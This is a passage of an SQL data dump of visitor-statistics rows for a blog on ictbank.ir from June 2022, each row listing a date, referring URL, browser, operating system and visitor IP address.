(21955,'2022-06-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(21956,'2022-06-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(21957,'2022-06-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(21958,'2022-06-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(21959,'2022-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.205.14.78','000',0,1,0),
(21960,'2022-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.83.114','000',0,1,0),
(21961,'2022-06-19','http://ictbank.ir/blog/index.php/category/web-security/apache/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.2','000',0,7,0),
(21962,'2022-06-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21963,'2022-06-19','http://ictbank.ir/blog','Safari','OS X','10.14',NULL,NULL,'','212.102.33.242','000',0,2,0),
(21964,'2022-06-19','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','193.122.175.102','000',0,4,0),
(21965,'2022-06-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(21966,'2022-06-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.69.254.180','000',0,3,0),
(21967,'2022-06-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,9,0),
(21968,'2022-06-20','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,7,0),
(21969,'2022-06-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(21970,'2022-06-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','79.139.188.59','000',0,6,0),
(21971,'2022-06-20','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','196.244.192.232','000',0,2,0),
(21972,'2022-06-20','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','42.236.10.75','000',0,1,0),
(21973,'2022-06-20','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.8','000',0,8,0),
(21974,'2022-06-20','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.126','000',0,1,0),
(21975,'2022-06-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','146.190.48.100','000',0,1,0),
(21976,'2022-06-20','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','95.52.103.153','000',0,2,0),
(21977,'2022-06-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(21978,'2022-06-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(21979,'2022-06-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(21980,'2022-06-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(21981,'2022-06-20','http://82.102.9.14/blog','Unknown','Unknown','Unknown',NULL,NULL,'','64.225.1.162','000',0,1,0),
(21982,'2022-06-21','http://wikisonnati.com/blog','Unknown','Unknown','Unknown',NULL,NULL,'','106.53.82.40','000',0,2,0),
(21983,'2022-06-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(21984,'2022-06-21','http://ictbank.ir/blog','Chrome','OS X','10.6.7',NULL,NULL,'','208.80.194.126','000',0,8,0),
(21985,'2022-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.201.9.12','000',0,1,0),
(21986,'2022-06-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.37','000',0,1,0),
(21987,'2022-06-21','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.42','000',0,2,0),
(21988,'2022-06-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,3,0),
(21989,'2022-06-21','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','20.91.190.24','000',0,2,0),
(21990,'2022-06-21','http://ictbank.ir/blog/comments/feed/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.64','000',0,1,0),
(21991,'2022-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.46','000',0,1,0),
(21992,'2022-06-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.59','000',0,3,0),
(21993,'2022-06-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(21994,'2022-06-21','http://www.design-arena.ir/blog','Chrome','Android','6.0',NULL,NULL,'','81.69.199.237','000',0,5,0),
(21995,'2022-06-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,10,0),
(21996,'2022-06-21','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','46.161.27.204','000',0,5,0),
(21997,'2022-06-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(21998,'2022-06-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,2,0),
(21999,'2022-06-21','http://ictbank.ir/blog/index.php/tag/reorganize/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.144','000',0,7,0),
(22000,'2022-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','154.50.137.58','000',0,2,0),
(22001,'2022-06-21','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.167','000',0,1,0),
(22002,'2022-06-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22003,'2022-06-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.187.177','000',0,1,0),
(22004,'2022-06-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(22005,'2022-06-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22006,'2022-06-21','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.65','000',0,1,0),
(22007,'2022-06-21','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.72','000',0,1,0),
(22008,'2022-06-21','http://ictbank.ir/blog/index.php/category/os/linxu/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.8','000',0,7,0),
(22009,'2022-06-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(22010,'2022-06-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(22011,'2022-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(22012,'2022-06-21','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','54.227.32.154','000',0,1,0),
(22013,'2022-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.95.197.195','000',0,24,0),
(22014,'2022-06-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,6,0),
(22015,'2022-06-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','54.90.74.74','000',0,4,0),
(22016,'2022-06-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(22017,'2022-06-22','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','208.80.194.126','000',0,1,0),
(22018,'2022-06-22','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','84.17.48.69','000',0,20,0),
(22019,'2022-06-22','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,1,0),
(22020,'2022-06-22','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.175','000',0,1,0),
(22021,'2022-06-22','http://ictbank.ir/blog','Edge','OS X','10.20.77',NULL,NULL,'','45.152.199.110','000',0,11,0),
(22022,'2022-06-22','http://www.ictbank.ir/blog','Edge','OS X','10.20.77',NULL,NULL,'','102.165.55.112','000',0,2,0),
(22023,'2022-06-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22024,'2022-06-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.2',NULL,NULL,'','208.80.194.121','000',0,5,0),
(22025,'2022-06-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.250.19.242','000',0,2,0),
(22026,'2022-06-22','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','64.225.29.117','000',0,2,0),
(22027,'2022-06-22','http://ictbank.ir/blog','Chrome','Android','5.0',NULL,NULL,'','138.19.178.68','000',0,1,0),
(22028,'2022-06-22','http://ictbank.ir/blog','Chrome','Android','5.0',NULL,NULL,'','143.202.213.115','000',0,1,0),
(22029,'2022-06-22','http://ictbank.ir/blog','Chrome','Android','5.0',NULL,NULL,'','177.195.66.159','000',0,1,0),
(22030,'2022-06-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(22031,'2022-06-22','http://www.design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,2,0),
(22032,'2022-06-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.144.195','000',0,1,0),
(22033,'2022-06-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.187.177','000',0,1,0),
(22034,'2022-06-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(22035,'2022-06-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22036,'2022-06-22','http://ictbank.ir/blog','Edge','OS X','10.20.77',NULL,NULL,'','212.102.33.245','000',0,2,0),
(22037,'2022-06-22','http://ictbank.ir/blog','Edge','OS X','10.20.77',NULL,NULL,'','212.102.33.34','000',0,3,0),
(22038,'2022-06-23','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(22039,'2022-06-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(22040,'2022-06-23','http://ictbank.ir/blog','Edge','OS X','10.20.77',NULL,NULL,'','212.102.33.34','000',0,3,0),
(22041,'2022-06-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(22042,'2022-06-23','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,7,0),
(22043,'2022-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.209.244','000',0,1,0),
(22044,'2022-06-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(22045,'2022-06-23','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','144.255.31.103','000',0,1,0),
(22046,'2022-06-23','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','42.236.10.84','000',0,3,0),
(22047,'2022-06-23','http://ictbank.ir/blog','Safari','iOS','11.0',NULL,NULL,'','171.13.14.40','000',0,1,0),
(22048,'2022-06-23','http://ictbank.ir/blog','Safari','iOS','11.0',NULL,NULL,'','171.13.14.83','000',0,1,0),
(22049,'2022-06-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(22050,'2022-06-23','http://ictbank.ir/blog','Safari','OS X','10.11.6',NULL,NULL,'','37.120.153.227','000',0,3,0),
(22051,'2022-06-23','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','46.161.27.204','000',0,5,0),
(22052,'2022-06-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.204.46','000',0,2,0),
(22053,'2022-06-23','http://ictbank.ir/blog/comments/feed/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.64','000',0,1,0),
(22054,'2022-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.223.29.190','000',0,2,0),
(22055,'2022-06-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.222.35','000',0,1,0),
(22056,'2022-06-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(22057,'2022-06-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,2,0),
(22058,'2022-06-23','http://82.102.9.14/blog','Chrome','Android','10.0',NULL,NULL,'','221.130.37.182','000',0,1,0),
(22059,'2022-06-23','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.36.158','000',0,1,0),
(22060,'2022-06-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(22061,'2022-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.121.9','000',0,2,0),
(22062,'2022-06-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(22063,'2022-06-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.6','000',0,6,0),
(22064,'2022-06-23','http://ictbank.ir/blog','Unknown','OS X','10.9.2',NULL,NULL,'','185.39.144.147','000',0,2,0),
(22065,'2022-06-24','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,3,0),
(22066,'2022-06-24','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','35.86.160.174','000',0,1,0),
(22067,'2022-06-24','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','40.122.200.30','000',0,2,0),
(22068,'2022-06-24','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.231.156.245','000',0,1,0),
(22069,'2022-06-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,10,0),
(22070,'2022-06-24','http://82.102.9.14:80/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','79.50.213.93','000',0,1,0),
(22071,'2022-06-24','http://ictbank.ir/blog','Safari','OS X','10.13',NULL,NULL,'','159.69.93.166','000',0,1,0),
(22072,'2022-06-24','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.202.78.175','000',0,2,0),
(22073,'2022-06-24','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','208.80.194.126','000',0,1,0),
(22074,'2022-06-24','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','212.102.33.35','000',0,2,0),
(22075,'2022-06-24','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','10.0',NULL,NULL,'','178.159.37.11','000',0,8,0),
(22076,'2022-06-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','5.42.199.58','000',0,8,0),
(22077,'2022-06-24','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.122','000',0,5,0),
(22078,'2022-06-24','http://82.102.9.14/blog','Unknown','Unknown','Unknown',NULL,NULL,'','64.225.68.42','000',0,1,0),
(22079,'2022-06-24','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','212.102.33.245','000',0,2,0),
(22080,'2022-06-24','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','163.116.205.116','000',0,1,0),
(22081,'2022-06-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.71.253.11','000',0,2,0),
(22082,'2022-06-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','109.87.150.16','000',0,1,0),
(22083,'2022-06-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','213.219.36.209','000',0,2,0),
(22084,'2022-06-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.90.3.164','000',0,1,0),
(22085,'2022-06-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.198','000',0,2,0),
(22086,'2022-06-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,2,0),
(22087,'2022-06-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.77','000',0,2,0),
(22088,'2022-06-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.169.18','000',0,2,0),
(22089,'2022-06-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22090,'2022-06-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.123.152','000',0,1,0),
(22091,'2022-06-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22092,'2022-06-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(22093,'2022-06-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.163','000',0,2,0),
(22094,'2022-06-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.39','000',0,1,0),
(22095,'2022-06-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,3,0),
(22096,'2022-06-25','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','196.19.240.95','000',0,10,0),
(22097,'2022-06-25','http://ictbank.ir/blog','Chrome','OS X','10.6.7',NULL,NULL,'','208.80.194.121','000',0,2,0),
(22098,'2022-06-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(22099,'2022-06-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','119.90.52.35','000',0,1,0),
(22100,'2022-06-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.122','000',0,2,0),
(22101,'2022-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','139.59.31.143','000',0,2,0),
(22102,'2022-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.45','000',0,1,0),
(22103,'2022-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','154.49.205.188','000',0,1,0),
(22104,'2022-06-25','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.126','000',0,4,0),
(22105,'2022-06-25','http://wikisonnati.com/blog/','Chrome','Windows','10.0',NULL,NULL,'','212.102.63.140','000',0,7,0),
(22106,'2022-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.90.28','000',0,1,0),
(22107,'2022-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(22108,'2022-06-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.56','000',0,2,0),
(22109,'2022-06-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.58.123.69','000',0,2,0),
(22110,'2022-06-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,3,0),
(22111,'2022-06-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22112,'2022-06-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(22113,'2022-06-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(22114,'2022-06-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(22115,'2022-06-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','213.219.37.187','000',0,2,0),
(22116,'2022-06-25','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.95.39.9','000',0,10,0),
(22117,'2022-06-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(22118,'2022-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.21','000',0,4,0),
(22119,'2022-06-25','http://ictbank.ir/blog/comments/feed/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.64','000',0,1,0),
(22120,'2022-06-26','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.122','000',0,5,0),
(22121,'2022-06-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(22122,'2022-06-26','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','61.19.208.34','000',0,4,0),
(22123,'2022-06-26','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22124,'2022-06-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22125,'2022-06-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22126,'2022-06-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.126','000',0,4,0),
(22127,'2022-06-26','http://www.wikisonnati.com/blog','Firefox','Windows','10.0',NULL,NULL,'','137.74.27.104','000',0,2,0),
(22128,'2022-06-26','http://wikisonnati.com/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.244','000',0,2,0),
(22129,'2022-06-26','http://ictbank.ir/blog','Chrome','OS X','10.9.5',NULL,NULL,'','107.175.36.225','000',0,13,0),
(22130,'2022-06-26','http://www.ictbank.ir/blog','Chrome','OS X','10.9.5',NULL,NULL,'','196.240.51.131','000',0,2,0),
(22131,'2022-06-26','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','159.65.171.198','000',0,4,0),
(22132,'2022-06-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.213','000',0,1,0),
(22133,'2022-06-26','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','35.89.205.175','000',0,2,0),
(22134,'2022-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.223.2.98','000',0,1,0),
(22135,'2022-06-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','130.162.169.44','000',0,2,0),
(22136,'2022-06-26','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','141.95.91.126','000',0,3,0),
(22137,'2022-06-26','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','51.254.199.11','000',0,1,0),
(22138,'2022-06-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22139,'2022-06-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.222.35','000',0,1,0),
(22140,'2022-06-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22141,'2022-06-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22142,'2022-06-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,1,0),
(22143,'2022-06-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.44','000',0,4,0),
(22144,'2022-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.183.106.3','000',0,1,0),
(22145,'2022-06-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.57','000',0,2,0),
(22146,'2022-06-27','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.49','000',0,1,0),
(22147,'2022-06-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(22148,'2022-06-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','20.5.88.176','000',0,1,0),
(22149,'2022-06-27','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.121','000',0,2,0),
(22150,'2022-06-27','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','2.185.144.134','000',0,1,0),
(22151,'2022-06-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,5,0),
(22152,'2022-06-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(22153,'2022-06-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.168','000',0,1,0),
(22154,'2022-06-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.200.4','000',0,2,0),
(22155,'2022-06-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(22156,'2022-06-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','209.141.52.161','000',0,2,0),
(22157,'2022-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.97.121','000',0,1,0),
(22158,'2022-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.32.196','000',0,1,0),
(22159,'2022-06-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22160,'2022-06-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(22161,'2022-06-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.0.229','000',0,1,0),
(22162,'2022-06-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22163,'2022-06-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(22164,'2022-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.61.24','000',0,1,0),
(22165,'2022-06-27','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','27.115.124.109','000',0,1,0),
(22166,'2022-06-27','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','27.115.124.45','000',0,1,0),
(22167,'2022-06-27','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','27.115.124.38','000',0,1,0),
(22168,'2022-06-27','http://82.102.9.14:80/blog','Edge','Windows','10.0',NULL,NULL,'','99.242.113.76','000',0,1,0),
(22169,'2022-06-28','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(22170,'2022-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','31.13.127.5','000',0,1,0),
(22171,'2022-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','31.13.127.10','000',0,1,0),
(22172,'2022-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','150.230.70.137','000',0,3,0),
(22173,'2022-06-28','http://ictbank.ir/blog','Chrome','OS X','10.9.5',NULL,NULL,'','212.102.33.36','000',0,2,0),
(22174,'2022-06-28','http://ictbank.ir/blog','Safari','OS X','10.7.2',NULL,NULL,'','208.80.194.126','000',0,2,0),
(22175,'2022-06-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(22176,'2022-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.163.208.90','000',0,2,0),
(22177,'2022-06-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','208.80.194.121','000',0,6,0),
(22178,'2022-06-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22179,'2022-06-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(22180,'2022-06-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
